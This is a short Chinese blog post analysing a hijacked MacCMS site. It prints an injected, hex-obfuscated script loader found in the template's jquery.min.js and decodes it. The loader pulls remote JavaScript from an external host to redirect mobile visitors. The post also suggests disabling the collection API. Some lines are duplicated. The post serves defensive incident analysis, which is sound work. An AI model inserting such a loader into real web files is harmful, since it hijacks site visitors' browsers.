文章最后更新时间:2025-11-18 00:00:00,由管理员负责审核发布,若内容或图片失效,请留言反馈!
网站被挂马跳转劫持跳转到H APP下载页。
被挂马的完整PC端正常无异常,移动页面js跳转,被增加了一个js跳转。
挂马图片
通过日志查看挂马过程
该漏洞是利用苹果CMS的API执行SHELL,
挂马文件在模板的jquery.min.js
;var head=document.getElementsByTagName(‘head’) [0];var script=document.createElement(‘script’);script [‘src’]=’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x6d\x61\x63\x63\x6d\x73\x2e\x7a\x32\x33\x2e\x77\x65\x62\x2e\x63\x6f\x72\x65\x2e\x77\x69\x6e\x64\x6f\x77\x73\x2e\x6e\x65\x74\x2f\x37\x33\x32\x64\x2e\x6a\x73’;head.appendChild(script);
解密之后是
解密之后是
var head = document.getElementsByTagName(‘head’) [0];
var script = document.createElement(‘script’);
script [‘src’] = ‘https://maccms.z23.web.core.windows.net/732d.js’;
head.appendChild(script);
清除代码
var script = document.createElement(‘script’);
script [‘src’] = ‘https://maccms.z23.web.core.windows.net/732d.js’;
head.appendChild(script);
清除代码
关闭后台采集API功能。或自定义API接口名字,
文章版权声明:除非注明,否则均为苹果CMS模板站原创文章,转载或复制请以超链接形式并注明出处。




发表评论